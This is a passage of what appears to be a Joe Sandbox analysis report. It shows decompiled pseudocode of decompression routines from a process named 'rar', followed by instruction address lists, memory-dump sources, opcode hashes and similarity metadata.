				if (_t646 - 1 <= 0) goto 0x50b66ca3;
				 *((char*)(_t875 + 1)) =  *((intOrPtr*)(_t816 + 1));
				if (_t646 - 2 <= 0) goto 0x50b66ca3;
				 *((char*)(_t875 + 2)) =  *((intOrPtr*)(_t816 + 2));
				if (_t646 - 3 <= 0) goto 0x50b66ca3;
				 *((char*)(_t875 + 3)) =  *((intOrPtr*)(_t816 + 3));
				if (_t646 - 4 <= 0) goto 0x50b66ca3;
				 *((char*)(_t875 + 4)) =  *((intOrPtr*)(_t816 + 4));
				if (_t646 - 5 <= 0) goto 0x50b66ca3;
				 *((char*)(_t875 + 5)) =  *((intOrPtr*)(_t816 + 5));
				_t749 = _t646 - 6;
				if (_t749 <= 0) goto 0x50b66ca3;
				 *((char*)(_t875 + 6)) =  *((intOrPtr*)(_t816 + 6));
				goto 0x50b67392;
				_t817 =  *((intOrPtr*)(_t800 + 0x4ba8));
				 *((char*)((_t884 >> 3) + _t817)) =  *((intOrPtr*)(( *(_t800 + 0xe978) & _t875) + _t817));
				_t790 =  *(_t800 + 0xe978);
				_t890 =  *(_t800 + 0xd8) + 0x00000001 & _t790;
				 *(_t800 + 0xd8) = _t890;
				if (_t749 != 0) goto 0x50b675cd;
				goto 0x50b66e39;
				_t878 =  &((_t800 + 0xb8)[_t841]);
				r15d =  *_t878;
				if (_t749 == 0) goto 0x50b6762f;
				 *_t878 =  *(_t800 + 0xb8 + _t841 * 4);
				if (_t749 != 0) goto 0x50b6761c;
				 *(_t800 + 0xb8) = r15d;
				_t851 = _t906[4];
				_t682 = _t906[1];
				_t655 = (( *( *_t906 + _t851 + 1) & 0x000000ff | ( *( *_t906 + _t851) & 0x000000ff) << 0x00000008) << 0x00000008 |  *( *_t906 + _t851 + 2) & 0x000000ff) >> 0x00000008 - _t682 & 0x0000fffe;
				if (_t655 -  *((intOrPtr*)(_t849 + 0x2d04 + _t817 * 4)) >= 0) goto 0x50b676ae;
				_t584 = r12d -  *((intOrPtr*)(_t849 + 0x2d84));
				r9d =  *((_t841 >> _t584) + _t849 + 0x2d88) & 0x000000ff;
				r9d = r9d + _t682;
				r11d = r11d + (r9d >> 3);
				r9d = r9d & 0x00000007;
				 *_t906 = r11d;
				_t906[1] = r9d;
				goto 0x50b67725;
				r10d = 0xf;
				_t585 = _t584 + 1;
				if (_t585 - r10d >= 0) goto 0x50b676de;
				r8d = _t585;
				if (_t655 -  *((intOrPtr*)(_t849 + (_t878 - 4 + 0xb41) * 4)) < 0) goto 0x50b676db;
				_t586 = _t585 + 1;
				if (_t586 - r10d < 0) goto 0x50b676c9;
				goto 0x50b676de;
				r10d = _t586;
				r9d = _t902 + _t852;
				r9d = r9d & 0x00000007;
				r11d = r11d + (r9d >> 3);
				_t906[1] = r9d;
				 *_t906 = r11d;
				asm("sbb eax, eax");
				r8d =  *(_t849 + 0x3988 + _t790 * 2) & 0xffff;
				if (r8d - 8 >= 0) goto 0x50b67735;
				r8d = r8d + 2;
				goto 0x50b6779f;
				r10d = r8d;
				r8d = r8d & 0x00000003;
				r8d = r8d | 0x00000004;
				r10d = r10d >> 2;
				r10d = r10d - 1;
				r8d = r8d << r10d;
				r8d = r8d + 2;
				if (r10d == 0) goto 0x50b6779f;
				_t594 = _t890 + _t902;
				r8d = r8d + (((( *(r11d + _t851 + 1) & 0x000000ff | ( *(r11d + _t851) & 0x000000ff) << 0x00000008) << 0x00000008 |  *(r11d + _t851 + 2) & 0x000000ff) >> 0x00000008 - r9d & 0x0000ffff) >> r12d - r10d);
				 *_t906 = (_t594 >> 3) + r11d;
				_t906[1] = _t594 & 0x00000007;
				_t891 =  *(_t800 + 0xd8);
				_t844 = _t891 - _t907;
				 *(_t800 + 0xcc) = r8d;
				_t792 =  *((intOrPtr*)(_t800 + 0xe970)) + 0xffffeffc;
				if (_t844 - _t792 >= 0) goto 0x50b678f1;
				if (_t891 - _t792 >= 0) goto 0x50b678f1;
				_t793 =  *((intOrPtr*)(_t800 + 0x4ba8));
				_t819 = _t793 + _t844;
				_t845 = _t793 + _t891;
				 *(_t800 + 0xd8) = _t793 + _t891;
				if (r8d - 8 < 0) goto 0x50b6785a;
				r9d = r8d;
				_t760 = r15d - r8d;
				if (_t760 >= 0) goto 0x50b67842;
				r8d = r8d + 0xfffffff8;
				 *_t845 =  *_t819;
				 *((char*)(_t845 + 1)) =  *((intOrPtr*)(_t819 + 1));
				 *((char*)(_t845 + 2)) =  *((intOrPtr*)(_t819 + 2));
				 *((char*)(_t845 + 3)) =  *((intOrPtr*)(_t819 + 3));
				 *((char*)(_t845 + 4)) =  *((intOrPtr*)(_t819 + 4));
				 *((char*)(_t845 + 5)) =  *((intOrPtr*)(_t819 + 5));
				 *((char*)(_t845 + 6)) =  *((intOrPtr*)(_t819 + 6));
				_t820 = _t819 + 8;
				 *((char*)(_t845 + 7)) =  *((intOrPtr*)(_t819 + 7));
				_t846 = _t845 + 8;
				if (_t760 != 0) goto 0x50b67800;
				goto 0x50b6785a;
				r8d = r8d + 0xfffffff8;
				 *_t846 =  *_t820;
				_t821 = _t820 + 8;
				_t847 = _t846 + 8;
				if (_t760 != 0) goto 0x50b67842;
				r9d = _a16;
				r10d = _a32;
				if (r8d == 0) goto 0x50b66ca3;
				 *_t847 =  *_t821;
				if (r8d - 1 <= 0) goto 0x50b66ca3;
				 *((char*)(_t847 + 1)) =  *((intOrPtr*)(_t821 + 1));
				if (r8d - 2 <= 0) goto 0x50b66ca3;
				 *((char*)(_t847 + 2)) =  *((intOrPtr*)(_t821 + 2));
				if (r8d - 3 <= 0) goto 0x50b66ca3;
				 *((char*)(_t847 + 3)) =  *((intOrPtr*)(_t821 + 3));
				if (r8d - 4 <= 0) goto 0x50b66ca3;
				 *((char*)(_t847 + 4)) =  *((intOrPtr*)(_t821 + 4));
				if (r8d - 5 <= 0) goto 0x50b66ca3;
				goto 0x50b67379;
				r10d = _a32;
				if (r8d == 0) goto 0x50b66c9e;
				 *((char*)((_t891 >> 3) +  *((intOrPtr*)(_t800 + 0x4ba8)))) =  *((intOrPtr*)(( *(_t800 + 0xe978) & _t847) +  *((intOrPtr*)(_t800 + 0x4ba8))));
				 *(_t800 + 0xd8) =  *(_t800 + 0xd8) + 0x00000001 &  *(_t800 + 0xe978);
				r8d = r8d + 0xffffffff;
				if (r8d != 0) goto 0x50b67910;
				r9d = _a16;
				goto 0x50b66ca3;
				 *((char*)(_t849 + 0x4adf)) = 1;
				return 1;
			}





































































































                                                                                                            0x7ff650b66c10
                                                                                                            0x7ff650b66c10
                                                                                                            0x7ff650b66c28
                                                                                                            0x7ff650b66c2c
                                                                                                            0x7ff650b66c2f
                                                                                                            0x7ff650b66c32
                                                                                                            0x7ff650b66c34
                                                                                                            0x7ff650b66c38
                                                                                                            0x7ff650b66c4a
                                                                                                            0x7ff650b66c4f
                                                                                                            0x7ff650b66c57
                                                                                                            0x7ff650b66c59
                                                                                                            0x7ff650b66c62
                                                                                                            0x7ff650b66c6a
                                                                                                            0x7ff650b66c70
                                                                                                            0x7ff650b66c79
                                                                                                            0x7ff650b66c7b
                                                                                                            0x7ff650b66c81
                                                                                                            0x7ff650b66c88
                                                                                                            0x7ff650b66c8b
                                                                                                            0x7ff650b66c90
                                                                                                            0x7ff650b66c94
                                                                                                            0x7ff650b66c9c
                                                                                                            0x7ff650b66c9e
                                                                                                            0x7ff650b66ca3
                                                                                                            0x7ff650b66cad
                                                                                                            0x7ff650b66cb4
                                                                                                            0x7ff650b66cbb
                                                                                                            0x7ff650b66cc1
                                                                                                            0x7ff650b66cc3
                                                                                                            0x7ff650b66cc5
                                                                                                            0x7ff650b66ccb
                                                                                                            0x7ff650b66cd3
                                                                                                            0x7ff650b66cdc
                                                                                                            0x7ff650b66ce5
                                                                                                            0x7ff650b66cf1
                                                                                                            0x7ff650b66cf7
                                                                                                            0x7ff650b66d0d
                                                                                                            0x7ff650b66d12
                                                                                                            0x7ff650b66d17
                                                                                                            0x7ff650b66d1c
                                                                                                            0x7ff650b66d2a
                                                                                                            0x7ff650b66d30
                                                                                                            0x7ff650b66d38
                                                                                                            0x7ff650b66d3c
                                                                                                            0x7ff650b66d66
                                                                                                            0x7ff650b66d70
                                                                                                            0x7ff650b66d79
                                                                                                            0x7ff650b66d7c
                                                                                                            0x7ff650b66d85
                                                                                                            0x7ff650b66d88
                                                                                                            0x7ff650b66d8b
                                                                                                            0x7ff650b66d8f
                                                                                                            0x7ff650b66d92
                                                                                                            0x7ff650b66d96
                                                                                                            0x7ff650b66d99
                                                                                                            0x7ff650b66da5
                                                                                                            0x7ff650b66da7
                                                                                                            0x7ff650b66db2
                                                                                                            0x7ff650b66db4
                                                                                                            0x7ff650b66dbb
                                                                                                            0x7ff650b66dc2
                                                                                                            0x7ff650b66dcd
                                                                                                            0x7ff650b66dcf
                                                                                                            0x7ff650b66dd1
                                                                                                            0x7ff650b66dd4
                                                                                                            0x7ff650b66de2
                                                                                                            0x7ff650b66de5
                                                                                                            0x7ff650b66de9
                                                                                                            0x7ff650b66ded
                                                                                                            0x7ff650b66df1
                                                                                                            0x7ff650b66df4
                                                                                                            0x7ff650b66e0a
                                                                                                            0x7ff650b66e16
                                                                                                            0x7ff650b66e1f
                                                                                                            0x7ff650b66e21
                                                                                                            0x7ff650b66e2f
                                                                                                            0x7ff650b66e32
                                                                                                            0x7ff650b66e40
                                                                                                            0x7ff650b66e48
                                                                                                            0x7ff650b66e53
                                                                                                            0x7ff650b66e59
                                                                                                            0x7ff650b66e64
                                                                                                            0x7ff650b66e66
                                                                                                            0x7ff650b66e6a
                                                                                                            0x7ff650b66e6c
                                                                                                            0x7ff650b66e6f
                                                                                                            0x7ff650b66e73
                                                                                                            0x7ff650b66e77
                                                                                                            0x7ff650b66e7b
                                                                                                            0x7ff650b66e81
                                                                                                            0x7ff650b66e84
                                                                                                            0x7ff650b66e8b
                                                                                                            0x7ff650b66eb5
                                                                                                            0x7ff650b66ec7
                                                                                                            0x7ff650b66ecc
                                                                                                            0x7ff650b66ecf
                                                                                                            0x7ff650b66ed2
                                                                                                            0x7ff650b66ed6
                                                                                                            0x7ff650b66eda
                                                                                                            0x7ff650b66f08
                                                                                                            0x7ff650b66f15
                                                                                                            0x7ff650b66f29
                                                                                                            0x7ff650b66f37
                                                                                                            0x7ff650b66f3a
                                                                                                            0x7ff650b66f46
                                                                                                            0x7ff650b66f48
                                                                                                            0x7ff650b66f53
                                                                                                            0x7ff650b66f55
                                                                                                            0x7ff650b66f5f
                                                                                                            0x7ff650b66f66
                                                                                                            0x7ff650b66f6a
                                                                                                            0x7ff650b66f71
                                                                                                            0x7ff650b66f73
                                                                                                            0x7ff650b66f75
                                                                                                            0x7ff650b66f78
                                                                                                            0x7ff650b66f88
                                                                                                            0x7ff650b66f8b
                                                                                                            0x7ff650b66f92
                                                                                                            0x7ff650b66f95
                                                                                                            0x7ff650b66fb1
                                                                                                            0x7ff650b66fbd
                                                                                                            0x7ff650b66fc0
                                                                                                            0x7ff650b66fc6
                                                                                                            0x7ff650b66fc8
                                                                                                            0x7ff650b66fcc
                                                                                                            0x7ff650b66fd1
                                                                                                            0x7ff650b66fd7
                                                                                                            0x7ff650b66fdd
                                                                                                            0x7ff650b66fe5
                                                                                                            0x7ff650b66fe9
                                                                                                            0x7ff650b66fef
                                                                                                            0x7ff650b66ff5
                                                                                                            0x7ff650b66ff9
                                                                                                            0x7ff650b66fff
                                                                                                            0x7ff650b67001
                                                                                                            0x7ff650b67017
                                                                                                            0x7ff650b6701d
                                                                                                            0x7ff650b6702a
                                                                                                            0x7ff650b67033
                                                                                                            0x7ff650b6703b
                                                                                                            0x7ff650b67045
                                                                                                            0x7ff650b6704d
                                                                                                            0x7ff650b67057
                                                                                                            0x7ff650b6705d
                                                                                                            0x7ff650b67060
                                                                                                            0x7ff650b67064
                                                                                                            0x7ff650b67067
                                                                                                            0x7ff650b6706a
                                                                                                            0x7ff650b6706e
                                                                                                            0x7ff650b6707d
                                                                                                            0x7ff650b67086
                                                                                                            0x7ff650b6708f
                                                                                                            0x7ff650b67093
                                                                                                            0x7ff650b67096
                                                                                                            0x7ff650b6709f
                                                                                                            0x7ff650b670ae
                                                                                                            0x7ff650b670b0
                                                                                                            0x7ff650b670c0
                                                                                                            0x7ff650b670cb
                                                                                                            0x7ff650b670d5
                                                                                                            0x7ff650b670d8
                                                                                                            0x7ff650b670db
                                                                                                            0x7ff650b670e7
                                                                                                            0x7ff650b670e9
                                                                                                            0x7ff650b670ef
                                                                                                            0x7ff650b670f4
                                                                                                            0x7ff650b67106
                                                                                                            0x7ff650b67108
                                                                                                            0x7ff650b67111
                                                                                                            0x7ff650b67113
                                                                                                            0x7ff650b67115
                                                                                                            0x7ff650b67118
                                                                                                            0x7ff650b6711c
                                                                                                            0x7ff650b6712d
                                                                                                            0x7ff650b67131
                                                                                                            0x7ff650b6713e
                                                                                                            0x7ff650b67149
                                                                                                            0x7ff650b6715c
                                                                                                            0x7ff650b6716b
                                                                                                            0x7ff650b6716e
                                                                                                            0x7ff650b67170
                                                                                                            0x7ff650b67186
                                                                                                            0x7ff650b6718c
                                                                                                            0x7ff650b671ac
                                                                                                            0x7ff650b671b6
                                                                                                            0x7ff650b671b9
                                                                                                            0x7ff650b671bc
                                                                                                            0x7ff650b671c2
                                                                                                            0x7ff650b671cd
                                                                                                            0x7ff650b671d0
                                                                                                            0x7ff650b671d4
                                                                                                            0x7ff650b671e1
                                                                                                            0x7ff650b671e3
                                                                                                            0x7ff650b671ed
                                                                                                            0x7ff650b671ef
                                                                                                            0x7ff650b671f9
                                                                                                            0x7ff650b671fb
                                                                                                            0x7ff650b67204
                                                                                                            0x7ff650b67210
                                                                                                            0x7ff650b6721c
                                                                                                            0x7ff650b67222
                                                                                                            0x7ff650b67229
                                                                                                            0x7ff650b67236
                                                                                                            0x7ff650b67239
                                                                                                            0x7ff650b67247
                                                                                                            0x7ff650b67250
                                                                                                            0x7ff650b67259
                                                                                                            0x7ff650b6725f
                                                                                                            0x7ff650b67266
                                                                                                            0x7ff650b6726a
                                                                                                            0x7ff650b67274
                                                                                                            0x7ff650b6727f
                                                                                                            0x7ff650b67281
                                                                                                            0x7ff650b67288
                                                                                                            0x7ff650b6728b
                                                                                                            0x7ff650b6728f
                                                                                                            0x7ff650b67293
                                                                                                            0x7ff650b67298
                                                                                                            0x7ff650b6729e
                                                                                                            0x7ff650b672a4
                                                                                                            0x7ff650b672aa
                                                                                                            0x7ff650b672b0
                                                                                                            0x7ff650b672b6
                                                                                                            0x7ff650b672bc
                                                                                                            0x7ff650b672c0
                                                                                                            0x7ff650b672c3
                                                                                                            0x7ff650b672cb
                                                                                                            0x7ff650b672cd
                                                                                                            0x7ff650b672d2
                                                                                                            0x7ff650b672d6
                                                                                                            0x7ff650b672d9
                                                                                                            0x7ff650b672dd
                                                                                                            0x7ff650b672e5
                                                                                                            0x7ff650b672ee
                                                                                                            0x7ff650b672f9
                                                                                                            0x7ff650b67301
                                                                                                            0x7ff650b6730e
                                                                                                            0x7ff650b67317
                                                                                                            0x7ff650b67325
                                                                                                            0x7ff650b6732e
                                                                                                            0x7ff650b6733c
                                                                                                            0x7ff650b67345
                                                                                                            0x7ff650b67353
                                                                                                            0x7ff650b6735c
                                                                                                            0x7ff650b6736a
                                                                                                            0x7ff650b67374
                                                                                                            0x7ff650b6737c
                                                                                                            0x7ff650b67386
                                                                                                            0x7ff650b6738f
                                                                                                            0x7ff650b67392
                                                                                                            0x7ff650b6739e
                                                                                                            0x7ff650b673a6
                                                                                                            0x7ff650b673a9
                                                                                                            0x7ff650b673c6
                                                                                                            0x7ff650b673de
                                                                                                            0x7ff650b673e5
                                                                                                            0x7ff650b673e9
                                                                                                            0x7ff650b673eb
                                                                                                            0x7ff650b673f6
                                                                                                            0x7ff650b673f8
                                                                                                            0x7ff650b6740a
                                                                                                            0x7ff650b67410
                                                                                                            0x7ff650b67410
                                                                                                            0x7ff650b6741f
                                                                                                            0x7ff650b67425
                                                                                                            0x7ff650b67430
                                                                                                            0x7ff650b67436
                                                                                                            0x7ff650b6743c
                                                                                                            0x7ff650b67448
                                                                                                            0x7ff650b67452
                                                                                                            0x7ff650b67458
                                                                                                            0x7ff650b6745f
                                                                                                            0x7ff650b67470
                                                                                                            0x7ff650b67473
                                                                                                            0x7ff650b6747c
                                                                                                            0x7ff650b67485
                                                                                                            0x7ff650b6748b
                                                                                                            0x7ff650b67492
                                                                                                            0x7ff650b67496
                                                                                                            0x7ff650b6749e
                                                                                                            0x7ff650b674a8
                                                                                                            0x7ff650b674aa
                                                                                                            0x7ff650b674b1
                                                                                                            0x7ff650b674b4
                                                                                                            0x7ff650b674bb
                                                                                                            0x7ff650b674c1
                                                                                                            0x7ff650b674c8
                                                                                                            0x7ff650b674cf
                                                                                                            0x7ff650b674d6
                                                                                                            0x7ff650b674dd
                                                                                                            0x7ff650b674e4
                                                                                                            0x7ff650b674eb
                                                                                                            0x7ff650b674ef
                                                                                                            0x7ff650b674f3
                                                                                                            0x7ff650b674fb
                                                                                                            0x7ff650b674fd
                                                                                                            0x7ff650b67502
                                                                                                            0x7ff650b67505
                                                                                                            0x7ff650b67508
                                                                                                            0x7ff650b6750c
                                                                                                            0x7ff650b67514
                                                                                                            0x7ff650b67516
                                                                                                            0x7ff650b67522
                                                                                                            0x7ff650b6752c
                                                                                                            0x7ff650b67534
                                                                                                            0x7ff650b67541
                                                                                                            0x7ff650b6754a
                                                                                                            0x7ff650b67558
                                                                                                            0x7ff650b67561
                                                                                                            0x7ff650b6756f
                                                                                                            0x7ff650b67578
                                                                                                            0x7ff650b67586
                                                                                                            0x7ff650b6758f
                                                                                                            0x7ff650b6759d
                                                                                                            0x7ff650b675a6
                                                                                                            0x7ff650b675b1
                                                                                                            0x7ff650b675b4
                                                                                                            0x7ff650b675bd
                                                                                                            0x7ff650b675c1
                                                                                                            0x7ff650b675cd
                                                                                                            0x7ff650b675dd
                                                                                                            0x7ff650b675e8
                                                                                                            0x7ff650b675f2
                                                                                                            0x7ff650b675f5
                                                                                                            0x7ff650b675ff
                                                                                                            0x7ff650b67601
                                                                                                            0x7ff650b67613
                                                                                                            0x7ff650b67617
                                                                                                            0x7ff650b6761a
                                                                                                            0x7ff650b67626
                                                                                                            0x7ff650b6762d
                                                                                                            0x7ff650b6762f
                                                                                                            0x7ff650b6763e
                                                                                                            0x7ff650b67642
                                                                                                            0x7ff650b6766b
                                                                                                            0x7ff650b67678
                                                                                                            0x7ff650b6767f
                                                                                                            0x7ff650b67684
                                                                                                            0x7ff650b6768d
                                                                                                            0x7ff650b67696
                                                                                                            0x7ff650b67699
                                                                                                            0x7ff650b6769d
                                                                                                            0x7ff650b676a0
                                                                                                            0x7ff650b676ac
                                                                                                            0x7ff650b676ae
                                                                                                            0x7ff650b676b4
                                                                                                            0x7ff650b676b9
                                                                                                            0x7ff650b676bb
                                                                                                            0x7ff650b676cc
                                                                                                            0x7ff650b676ce
                                                                                                            0x7ff650b676d7
                                                                                                            0x7ff650b676d9
                                                                                                            0x7ff650b676db
                                                                                                            0x7ff650b676de
                                                                                                            0x7ff650b676ee
                                                                                                            0x7ff650b676f2
                                                                                                            0x7ff650b676f5
                                                                                                            0x7ff650b676f9
                                                                                                            0x7ff650b67719
                                                                                                            0x7ff650b67725
                                                                                                            0x7ff650b6772d
                                                                                                            0x7ff650b6772f
                                                                                                            0x7ff650b67733
                                                                                                            0x7ff650b67735
                                                                                                            0x7ff650b67738
                                                                                                            0x7ff650b6773c
                                                                                                            0x7ff650b67740
                                                                                                            0x7ff650b67744
                                                                                                            0x7ff650b6774a
                                                                                                            0x7ff650b6774d
                                                                                                            0x7ff650b67754
                                                                                                            0x7ff650b67786
                                                                                                            0x7ff650b6778c
                                                                                                            0x7ff650b67798
                                                                                                            0x7ff650b6779b
                                                                                                            0x7ff650b6779f
                                                                                                            0x7ff650b677b0
                                                                                                            0x7ff650b677b3
                                                                                                            0x7ff650b677ba
                                                                                                            0x7ff650b677c3
                                                                                                            0x7ff650b677cc
                                                                                                            0x7ff650b677d2
                                                                                                            0x7ff650b677d9
                                                                                                            0x7ff650b677dd
                                                                                                            0x7ff650b677e7
                                                                                                            0x7ff650b677f2
                                                                                                            0x7ff650b677f4
                                                                                                            0x7ff650b677fb
                                                                                                            0x7ff650b677fe
                                                                                                            0x7ff650b67802
                                                                                                            0x7ff650b67806
                                                                                                            0x7ff650b6780b
                                                                                                            0x7ff650b67811
                                                                                                            0x7ff650b67817
                                                                                                            0x7ff650b6781d
                                                                                                            0x7ff650b67823
                                                                                                            0x7ff650b67829
                                                                                                            0x7ff650b6782f
                                                                                                            0x7ff650b67833
                                                                                                            0x7ff650b67836
                                                                                                            0x7ff650b6783e
                                                                                                            0x7ff650b67840
                                                                                                            0x7ff650b67845
                                                                                                            0x7ff650b67849
                                                                                                            0x7ff650b6784c
                                                                                                            0x7ff650b67850
                                                                                                            0x7ff650b67858
                                                                                                            0x7ff650b6785a
                                                                                                            0x7ff650b67866
                                                                                                            0x7ff650b67871
                                                                                                            0x7ff650b67879
                                                                                                            0x7ff650b67886
                                                                                                            0x7ff650b6788f
                                                                                                            0x7ff650b6789d
                                                                                                            0x7ff650b678a6
                                                                                                            0x7ff650b678b4
                                                                                                            0x7ff650b678bd
                                                                                                            0x7ff650b678cb
                                                                                                            0x7ff650b678d4
                                                                                                            0x7ff650b678e2
                                                                                                            0x7ff650b678ec
                                                                                                            0x7ff650b678f8
                                                                                                            0x7ff650b67903
                                                                                                            0x7ff650b67920
                                                                                                            0x7ff650b67938
                                                                                                            0x7ff650b6793f
                                                                                                            0x7ff650b67943
                                                                                                            0x7ff650b67945
                                                                                                            0x7ff650b67951
                                                                                                            0x7ff650b67956
                                                                                                            0x7ff650b67973

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 7b450042ee8ca7ca6e37cbb7ccd789f577fad2e14e01cc5afa386c81913e4076
                                                                                                            • Instruction ID: b6cf7ce7cf610afc6e4d9bc74186fc8b94ca25e528e1520a61cf7bc1ddc08662
                                                                                                            • Opcode Fuzzy Hash: 7b450042ee8ca7ca6e37cbb7ccd789f577fad2e14e01cc5afa386c81913e4076
                                                                                                            • Instruction Fuzzy Hash: 90821373A181D25AD765CF28C184BBC7BA1F752744F08C232DA9A93B85CE3EE855CB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B1F0D0 Relevance: .8, Instructions: 820COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a138d3896fec33d7a93823114d61d4858be2f939bf29ac44aa6d99652c1c8aeb
                                                                                                            • Instruction ID: d4aedba0fbd6f7be1ed2ed6b246473accfb3719416e2bd1ef7efc44e286883b7
                                                                                                            • Opcode Fuzzy Hash: a138d3896fec33d7a93823114d61d4858be2f939bf29ac44aa6d99652c1c8aeb
                                                                                                            • Instruction Fuzzy Hash: 5172AFAAD3EF866AE303A73950131A6E7186FF39C5641E327FD9432C52FB11E6D25204
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B1AAF8 Relevance: .6, Instructions: 616COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 70%
                                                                                                            			E00007FF67FF650B1AAF8(void* __edx, void* __rax, void* __rcx, void* __r8, long long __r10, void* __r11) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed int _t287;
				intOrPtr _t291;
				void* _t292;
				void* _t325;
				intOrPtr _t345;
				char _t347;
				void* _t352;
				signed short _t370;
				void* _t393;
				signed int _t397;
				void* _t399;
				void* _t406;
				void* _t407;
				void* _t412;
				void* _t443;
				signed long long _t494;
				long long _t498;
				long long _t501;
				void* _t504;
				long long _t505;
				long long _t506;
				void* _t508;
				signed long long _t510;
				void* _t533;
				void* _t536;
				void* _t581;
				void* _t626;
				void* _t629;
				long long _t630;
				signed long long _t632;
				void* _t634;
				void* _t636;
				void* _t637;
				void* _t638;
				signed long long _t639;
				intOrPtr _t659;
				long long _t662;
				void* _t663;
				signed long long _t664;
				void* _t665;
				void* _t666;
				void* _t667;
				void* _t668;
				void* _t669;

				_t663 = __r11;
				_t662 = __r10;
				_t641 = __r8;
				_t637 = _t638 - 0x1868;
				E00007FF67FF650B69CB0(0x1968, __rax, __r10, __r11);
				_t639 = _t638 - __rax;
				_t494 =  *0x50b978f0; // 0x27db226282f1
				 *(_t637 + 0x1850) = _t494 ^ _t639;
				r13b = r9b;
				 *(_t639 + 0x50) = r9b;
				_t669 = __r8;
				_t399 = __edx;
				_t665 = __rcx;
				E00007FF67FF650B48E10(_t494 ^ _t639, _t639 + 0x58);
				r10d = 0;
				r12b = r10b;
				 *(_t639 + 0x51) = r10b;
				_t6 = _t662 + 5; // 0x5
				_t7 = _t662 + 0x10; // 0x10
				r8d = _t7;
				_t8 = _t662 + 4; // 0x4
				r11d = _t8;
				if ( *((intOrPtr*)(__rcx + 0x7f84)) == r10b) goto 0x50b1ac0a;
				if (__edx == 0) goto 0x50b1b446;
				if (__edx == r11d) goto 0x50b1acb0;
				E00007FF67FF650B29B14(_t504, _t637 + 0x40, _t581, _t630, __r8);
				r12b = 1;
				 *(_t639 + 0x51) = r12b;
				_t505 = __rcx + 0x1040;
				_t656 =  *((intOrPtr*)(__rcx + 0x22d8)) + 0x6030;
				 *((long long*)(_t639 + 0x40)) = _t637 + 0x38;
				 *(_t639 + 0x38) =  *(_t639 + 0x38) & 0x00000000;
				 *((intOrPtr*)(_t639 + 0x30)) =  *((intOrPtr*)(__rcx + 0x34f8));
				 *(_t639 + 0x28) = _t637 + 0x40;
				 *((long long*)(_t639 + 0x20)) = __rcx + 0x34fc;
				r8d = _t6;
				E00007FF67FF650B28FF0(r12b, _t505, _t505,  *((intOrPtr*)(__rcx + 0x22d8)) + 0x6030);
				r10d = 0;
				if (r13b != 0) goto 0x50b1abfc;
				_t24 = _t630 + 0xb; // 0x10
				r8d = _t24;
				E00007FF67FF650B329C4(_t352, r12b, _t406, _t637 + 0x40, _t505, __rcx, _t637 + 0x40, _t641);
				r10d = 0;
				 *((long long*)(_t637 - 0x78)) = _t505;
				r11d = 4;
				_t27 = _t663 + 0xc; // 0x10
				r8d = _t27;
				_t412 = _t399;
				if (_t412 == 0) goto 0x50b1b446;
				if (_t412 == 0) goto 0x50b1b2d9;
				if (_t412 == 0) goto 0x50b1ade9;
				if (_t412 == 0) goto 0x50b1ade9;
				if (_t412 == 0) goto 0x50b1acb0;
